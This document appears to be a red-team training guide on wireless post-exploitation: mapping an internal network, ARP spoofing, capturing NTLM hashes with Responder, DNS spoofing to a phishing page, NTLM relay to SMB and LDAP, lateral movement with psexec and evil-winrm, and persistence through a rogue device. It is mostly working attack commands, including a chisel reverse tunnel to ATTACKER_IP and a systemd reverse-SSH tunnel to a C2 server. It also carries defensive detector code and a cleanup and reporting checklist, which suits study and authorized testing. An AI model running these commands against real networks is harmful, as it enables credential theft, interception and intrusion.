Wireless Post-Exploitation
Cracking a WiFi password is only the beginning. This guide covers what to do after gaining wireless network access — pivoting into the internal network, intercepting traffic, relaying credentials, and moving laterally from the wireless segment into wired infrastructure.
Scope Check
Prerequisites
- Successfully connected to the target wireless network (WPA key cracked)
- IP address obtained via DHCP or static assignment
- nmap, responder, bettercap, and impacket installed
- Understanding of ARP, DNS, and NTLM relay concepts
Network Reconnaissance
Once connected to the wireless network, the first step is mapping the internal network — identify the subnet, gateway, DNS servers, and all reachable hosts and services.
# Check your assigned IP and gateway
ip addr show wlan0
ip route show
# Identify the subnet and DNS
cat /etc/resolv.conf
# Quick host discovery (ARP scan — fastest, subnet only)
sudo arp-scan --interface=wlan0 --localnet
# Nmap host discovery + common port scan
nmap -sn 192.168.1.0/24 -oA discovery
nmap -sV -sC --top-ports 100 192.168.1.0/24 -oA initial_scan
# Identify the domain controller (if AD environment)
nmap -p 88,389,636,445,53 192.168.1.0/24 --open -oG dc_scan.txt
# Check for network shares
smbclient -L //192.168.1.1 -N
crackmapexec smb 192.168.1.0/24 --shares
Wireless vs. Wired Segmentation
ARP Spoofing & MITM
ARP spoofing positions you as a man-in-the-middle between the target and the gateway, allowing you to intercept, modify, or redirect all network traffic on the wireless segment.
# Method 1: Bettercap (recommended — handles forwarding automatically)
sudo bettercap -iface wlan0
# Inside bettercap:
> net.probe on # Discover hosts
> net.show # List discovered hosts
> set arp.spoof.targets 192.168.1.50 # Target specific host
> arp.spoof on # Start ARP poisoning
> net.sniff on # Capture traffic
# Method 2: arpspoof + IP forwarding (manual)
echo 1 | sudo tee /proc/sys/net/ipv4/ip_forward
sudo arpspoof -i wlan0 -t 192.168.1.50 -r 192.168.1.1
# Method 3: Ettercap (GUI available)
sudo ettercap -T -M arp:remote /192.168.1.50// /192.168.1.1//
⚠️ ARP Spoofing Detection
Modern switches and network monitoring tools (DHCP snooping, Dynamic ARP Inspection) can detect and block ARP spoofing. Wireless networks are more vulnerable since all clients share the broadcast domain. Check for DAI before assuming success.
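The detection the warning above describes does not have to live in a switch. The same two symptoms of gateway poisoning (a pinned IP suddenly answering from a new MAC, and one MAC claiming several IPs) can be spotted by any host or sensor that watches ARP replies on the wireless segment. The following is an added example, not code from the original guide; the reply stream and the "trusted" gateway entry are constructed for the demo, and a real deployment would feed it replies from a capture library and pin the gateway from an asset inventory.

```python
"""Passive ARP-spoof detector (added example, not from the original guide).

Consumes (ip, mac) pairs taken from ARP replies and raises an alert when a known
IP changes MAC (critical if the IP is a pinned entry such as the gateway) or
when one MAC ends up claiming more than one IP, which is what a poisoner's
interface looks like once it answers for both the gateway and the victim.
"""
from collections import defaultdict

# Constructed sample stream: gateway .1 and host .50 answer legitimately, then a
# third interface (de:ad:...) starts answering for both of them.
SAMPLE_REPLIES = [
    ("192.168.1.1", "aa:bb:cc:00:00:01"),
    ("192.168.1.50", "aa:bb:cc:00:00:50"),
    ("192.168.1.1", "aa:bb:cc:00:00:01"),
    ("192.168.1.1", "de:ad:be:ef:00:01"),   # gateway MAC flips
    ("192.168.1.50", "de:ad:be:ef:00:01"),  # same MAC now also claims .50
]


class ArpWatch:
    def __init__(self, trusted=None):
        # trusted: static IP -> MAC pins (assumed to come from inventory); never overwritten
        self.table = dict(trusted or {})
        self.pinned = set(self.table)
        self.ips_by_mac = defaultdict(set)
        for ip, mac in self.table.items():
            self.ips_by_mac[mac].add(ip)
        self.alerts = []

    def observe(self, ip, mac):
        """Record one ARP reply; return the cumulative alert list."""
        mac = mac.lower()
        prev = self.table.get(ip)
        if prev is not None and prev != mac:
            severity = "critical" if ip in self.pinned else "warning"
            self.alerts.append((severity, f"{ip} moved from {prev} to {mac}"))
        self.ips_by_mac[mac].add(ip)
        if len(self.ips_by_mac[mac]) > 1:
            claimed = sorted(self.ips_by_mac[mac])
            self.alerts.append(("warning", f"{mac} claims {claimed}"))
        if ip not in self.pinned:
            self.table[ip] = mac
        return self.alerts


def run_demo(replies=SAMPLE_REPLIES, gateway=("192.168.1.1", "aa:bb:cc:00:00:01")):
    """Replay the constructed stream with the gateway pinned; return the alerts raised."""
    watch = ArpWatch(trusted={gateway[0]: gateway[1]})
    for ip, mac in replies:
        watch.observe(ip, mac)
    return watch.alerts


if __name__ == "__main__":
    for severity, message in run_demo():
        print(f"[{severity}] {message}")
```

On the sample stream the fourth reply produces a critical alert for the gateway and the fifth produces both a host-move warning and a duplicate-claim warning, which is the signature bettercap or arpspoof leave behind while poisoning. Pinning the gateway matters: without a pin the detector would simply learn the attacker's MAC as the new "truth".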
Credential Sniffing
With MITM position established, capture credentials from unencrypted protocols and downgraded connections. Even HTTPS can be stripped in some configurations.
# Bettercap with HTTP proxy and credential sniffing
sudo bettercap -iface wlan0
> set arp.spoof.targets 192.168.1.0/24
> arp.spoof on
> set net.sniff.verbose true
> set net.sniff.output captured.pcap
> net.sniff on
# Capture HTTP credentials (unencrypted forms/Basic auth)
# Bettercap logs them automatically when sniffing
# Responder — poison LLMNR/NBT-NS/mDNS to capture NTLMv2 hashes
sudo responder -I wlan0 -wrf
# Check captured hashes
cat /usr/share/responder/logs/*.txt
# Crack captured NTLMv2 hashes
hashcat -m 5600 hashes.txt /usr/share/wordlists/rockyou.txt
Responder on Wireless
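Responder's LLMNR poisoning is easy to detect from the defender's side with a canary: query the LLMNR multicast group for a random name that no host can own. A healthy segment stays silent, so any A answer both proves a poisoner is active and reveals its IP. The code below is an added example, not part of the original guide; the poisoned reply used in the demo is constructed in `fake_poisoned_response`, and `probe_live` (which sends one real query) is the only function that touches the network.

```python
"""LLMNR poisoning canary (added example, not from the original guide).

Builds an LLMNR query for a name that cannot exist and parses whatever comes
back. LLMNR reuses the DNS message format over UDP 5355 to 224.0.0.252.
"""
import secrets
import socket
import struct

LLMNR_GROUP = ("224.0.0.252", 5355)   # LLMNR multicast address and port
FLAG_RESPONSE = 0x8000                 # QR bit in the DNS-style header


def encode_name(name):
    """Encode a hostname as DNS labels: <len><label>...<0>."""
    labels = name.strip(".").split(".")
    return b"".join(bytes([len(lab)]) + lab.encode("ascii") for lab in labels) + b"\x00"


def build_query(name, txid):
    """LLMNR query for an A record: 12-byte header, question name, type A, class IN."""
    header = struct.pack("!HHHHHH", txid, 0, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack("!HH", 1, 1)


def _skip_name(data, off):
    """Advance past a (possibly compressed) name and return the new offset."""
    while True:
        length = data[off]
        if length == 0:
            return off + 1
        if length & 0xC0 == 0xC0:      # compression pointer: 2 bytes, ends the name
            return off + 2
        off += 1 + length


def parse_answers(data, txid):
    """Return IPv4 addresses from A answers whose transaction id matches ours."""
    rid, flags, qd, an, _, _ = struct.unpack_from("!HHHHHH", data, 0)
    if rid != txid or not flags & FLAG_RESPONSE:
        return []
    off = 12
    for _ in range(qd):                 # skip the echoed question(s)
        off = _skip_name(data, off) + 4
    ips = []
    for _ in range(an):
        off = _skip_name(data, off)
        rtype, _rclass, _ttl, rdlen = struct.unpack_from("!HHIH", data, off)
        off += 10
        if rtype == 1 and rdlen == 4:
            ips.append(socket.inet_ntoa(data[off:off + 4]))
        off += rdlen
    return ips


def honey_check(response, txid):
    """The canary name must never resolve: any A answer means someone is poisoning."""
    ips = parse_answers(response, txid)
    return {"poisoned": bool(ips), "responders": ips}


def random_canary():
    """A name no legitimate host could have."""
    return "wkst-" + secrets.token_hex(4)


def fake_poisoned_response(query, answer_ip):
    """Constructed sample of a poisoner's reply: echoes the question, answers with its IP."""
    txid = struct.unpack_from("!H", query, 0)[0]
    header = struct.pack("!HHHHHH", txid, FLAG_RESPONSE, 1, 1, 0, 0)
    answer = b"\xc0\x0c" + struct.pack("!HHIH", 1, 1, 30, 4) + socket.inet_aton(answer_ip)
    return header + query[12:] + answer


def probe_live(timeout=2.0):
    """Send one canary query to the multicast group and report any reply."""
    txid = secrets.randbelow(0x10000)
    query = build_query(random_canary(), txid)
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.settimeout(timeout)
        sock.sendto(query, LLMNR_GROUP)
        try:
            data, addr = sock.recvfrom(512)
        except socket.timeout:
            return {"poisoned": False, "responders": []}
    result = honey_check(data, txid)
    result["source"] = addr[0]
    return result


if __name__ == "__main__":
    q = build_query("wkst-c0ffee11", 0x1234)
    print(honey_check(fake_poisoned_response(q, "192.168.1.200"), 0x1234))
```

Run `probe_live()` periodically from a sensor on the wireless VLAN; on a clean network it times out, and when Responder is running the returned `source` and `responders` both point at the poisoner. Disabling LLMNR and NBT-NS by group policy removes the attack surface entirely and is the fix to report alongside any hashes captured.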
DNS Spoofing
Redirect DNS queries to serve phishing pages, capture credentials, or redirect traffic to attacker-controlled infrastructure.
# Bettercap DNS spoofing (requires ARP spoof active)
sudo bettercap -iface wlan0
> set dns.spoof.domains intranet.corp.local, portal.corp.local
> set dns.spoof.address 192.168.1.200 # Your IP
> dns.spoof on
# Host a credential harvesting page
# (use with authorization only — phishing assessment)
python3 -m http.server 80 # Serve your phishing page
# Alternative: dnschef (standalone DNS proxy)
sudo dnschef --fakedomains=intranet.corp.local --fakeip=192.168.1.200 -i 0.0.0.0
NTLM Relay from WiFi
If the wireless segment has visibility to Active Directory services, captured NTLM authentication attempts can be relayed to other hosts to gain access without cracking the password.
# Step 1: Identify SMB targets that don't require signing
crackmapexec smb 192.168.1.0/24 --gen-relay-list targets.txt
# Step 2: Start ntlmrelayx (Impacket)
# Relay captured NTLM auth to targets and dump SAM
sudo ntlmrelayx.py -tf targets.txt -smb2support
# Step 3: Trigger authentication
# Option A: Responder (LLMNR/NBT-NS poisoning)
sudo responder -I wlan0 -wrf --disable-ess
# Option B: Force auth via captured credentials or file share link
# Create an SCF/URL file on a writable share that triggers auth
# Step 4: Check ntlmrelayx output for:
# - SAM dumps (local admin hashes)
# - Secretsdump output
# - Command execution results
# Advanced: Relay to LDAP for AD takeover
sudo ntlmrelayx.py -t ldap://DC_IP --delegate-access
SMB Signing
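The whole SMB signing question comes down to one field: the SecurityMode of the SMB2 NEGOTIATE response (MS-SMB2 2.2.4). Step 1 of the relay above succeeds only against hosts that do not set SMB2_NEGOTIATE_SIGNING_REQUIRED. The parser below is an added example, not code from the guide or from impacket/crackmapexec; it reads that field from raw response bytes and turns it into an audit verdict. `build_sample_response` is a constructed stand-in for real responses so the example runs offline.

```python
"""SMB signing posture check (added example, not from the original guide).

Parses the SecurityMode of an SMB2 NEGOTIATE response and classifies the host.
Offsets follow the 64-byte SMB2 header and the NEGOTIATE response body in MS-SMB2.
"""
import struct

SMB2_MAGIC = b"\xfeSMB"
SMB2_HEADER_LEN = 64
SMB2_NEGOTIATE = 0x0000
SMB2_FLAGS_SERVER_TO_REDIR = 0x00000001
SIGNING_ENABLED = 0x0001     # SMB2_NEGOTIATE_SIGNING_ENABLED
SIGNING_REQUIRED = 0x0002    # SMB2_NEGOTIATE_SIGNING_REQUIRED


def parse_negotiate(pkt):
    """Return (security_mode, dialect) from an SMB2 NEGOTIATE response."""
    if len(pkt) < SMB2_HEADER_LEN + 6 or pkt[:4] != SMB2_MAGIC:
        raise ValueError("not an SMB2 message")
    command, = struct.unpack_from("<H", pkt, 12)   # header Command field
    flags, = struct.unpack_from("<I", pkt, 16)     # header Flags field
    if command != SMB2_NEGOTIATE or not flags & SMB2_FLAGS_SERVER_TO_REDIR:
        raise ValueError("not a NEGOTIATE response")
    size, security_mode, dialect = struct.unpack_from("<HHH", pkt, SMB2_HEADER_LEN)
    if size != 65:                                  # fixed StructureSize of the response
        raise ValueError("unexpected NEGOTIATE response structure")
    return security_mode, dialect


def verdict(security_mode):
    """Classify relay exposure; the fix is the LanmanServer RequireSecuritySignature policy."""
    if security_mode & SIGNING_REQUIRED:
        return "ok: signing required (relay not possible)"
    if security_mode & SIGNING_ENABLED:
        return "finding: signing enabled but not required (relayable); require signing via policy"
    return "finding: signing disabled (relayable); enable and require signing"


def audit(responses):
    """responses: {host: raw NEGOTIATE response bytes} -> {host: verdict or parse error}."""
    out = {}
    for host, pkt in responses.items():
        try:
            mode, _dialect = parse_negotiate(pkt)
            out[host] = verdict(mode)
        except ValueError as exc:
            out[host] = f"error: {exc}"
    return out


def build_sample_response(security_mode, dialect=0x0311):
    """Constructed minimal NEGOTIATE response (64-byte header + body) for offline use."""
    header = (SMB2_MAGIC + struct.pack("<HHI", 64, 0, 0)              # StructureSize, CreditCharge, Status
              + struct.pack("<HHI", SMB2_NEGOTIATE, 1, SMB2_FLAGS_SERVER_TO_REDIR)
              + struct.pack("<IQ", 0, 0)                               # NextCommand, MessageId
              + struct.pack("<IIQ", 0, 0, 0)                           # Reserved, TreeId, SessionId
              + b"\x00" * 16)                                          # Signature
    body = (struct.pack("<HHHH", 65, security_mode, dialect, 0)        # size, SecurityMode, Dialect, ctx count
            + b"\x00" * 16                                             # ServerGuid
            + struct.pack("<IIII", 0, 0x800000, 0x800000, 0x800000)    # Capabilities, Max* sizes
            + struct.pack("<QQ", 0, 0)                                 # SystemTime, ServerStartTime
            + struct.pack("<HHI", 128, 0, 0))                          # SecBuf offset/len, ctx offset
    return header + body


# Constructed inventory: a DC that requires signing, two member hosts, and an SMB1-only box.
SAMPLE_HOSTS = {
    "192.168.1.10": build_sample_response(SIGNING_ENABLED | SIGNING_REQUIRED),
    "192.168.1.50": build_sample_response(SIGNING_ENABLED),
    "192.168.1.60": build_sample_response(0),
    "192.168.1.70": b"\xffSMB" + b"\x00" * 70,
}


if __name__ == "__main__":
    for host, result in audit(SAMPLE_HOSTS).items():
        print(f"{host}: {result}")
```

Feed `audit` with the NEGOTIATE responses a scanner or packet capture collected and the "finding" entries are exactly the hosts a `--gen-relay-list` run would list; the report recommendation for each is to require SMB signing (RequireSecuritySignature on the server side, enforced by group policy), which closes the relay path regardless of whether LLMNR is still enabled.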
crackmapexec smb TARGET --gen-relay-list
Lateral Movement
Move from the wireless segment into wired infrastructure using captured credentials or relay-obtained access.
# With captured credentials — check access scope
crackmapexec smb 192.168.1.0/24 -u 'user' -p 'password' --shares
# WinRM access (if port 5985 open)
evil-winrm -i 192.168.1.50 -u 'user' -p 'password'
# PsExec via Impacket
psexec.py 'DOMAIN/user:password@192.168.1.50'
# SSH pivoting through a compromised host to reach wired VLANs
ssh -D 9050 user@192.168.1.50 # SOCKS proxy
proxychains nmap -sT -p 445,3389 10.0.0.0/24
# Chisel tunnel (if SSH unavailable)
# On attacker: chisel server -p 8080 --reverse
# On target: chisel client ATTACKER_IP:8080 R:socks
| Pivot Scenario | Technique | Tool |
|---|---|---|
| WiFi → wired via dual-homed host | SSH/SOCKS proxy through compromised printer or thin client | ssh -D / chisel |
| WiFi → AD domain controller | NTLM relay to LDAP or Kerberos attack | ntlmrelayx / impacket |
| Guest WiFi → corporate | Scan for misconfigured firewall rules between VLANs | nmap / traceroute |
| IoT VLAN → management | Compromise IoT device, use as network pivot | metasploit / ligolo |
Wireless Persistence
Maintaining access after initial compromise — useful for red team engagements with multi-day operational windows.
# Option 1: Deploy a rogue AP as persistent backdoor
# Use a small device (Raspberry Pi / GL.iNet) configured to:
# - Connect to target WiFi as a client
# - Create a reverse SSH tunnel to C2
# - Bridge or NAT traffic for remote access
# Auto-connect and tunnel on boot (systemd service)
# /etc/systemd/system/wifi-tunnel.service
# [Service]
# ExecStart=/usr/bin/ssh -N -R 2222:localhost:22 c2@YOUR_SERVER -o StrictHostKeyChecking=no
# Restart=always
# Option 2: WPA-Enterprise certificate persistence
# If you've compromised the RADIUS server or CA:
# - Issue legitimate client certificates
# - Connect with valid 802.1X credentials
# Option 3: Pre-shared key access
# The cracked WPA2 key provides persistent access until changed
# Monitor for SSID password changes:
airodump-ng wlan0mon --wps --write monitoring
Red Team Consideration
Cleanup & Reporting
Properly clean up after post-exploitation activities and document findings for the report.
✅ Cleanup Checklist
- Stop all ARP spoofing and restore ARP tables
- Terminate Responder and DNS spoofing
- Remove implants and rogue APs
- Delete dropped files from compromised hosts
- Flush IP forwarding rules
- Disconnect from target wireless network
📝 Report Findings
- WiFi key cracked → time to crack, method used
- Network segmentation gaps (WiFi → wired access)
- Credentials captured via LLMNR/MITM
- NTLM relay success → hosts compromised
- Lateral movement path to sensitive systems
- Recommended mitigations per finding
# Restore ARP tables (stop bettercap gracefully)
# bettercap: arp.spoof off → exit
# Manual ARP restore
sudo arpspoof -i wlan0 -t 192.168.1.50 -r 192.168.1.1 # Ctrl+C sends restore packets
# Disable IP forwarding
echo 0 | sudo tee /proc/sys/net/ipv4/ip_forward
# Clear iptables rules added during testing
sudo iptables -t nat -F
sudo iptables -F
Wireless Post-Exploitation Practice
Practice pivoting from wireless access into internal network exploitation in a safe lab environment.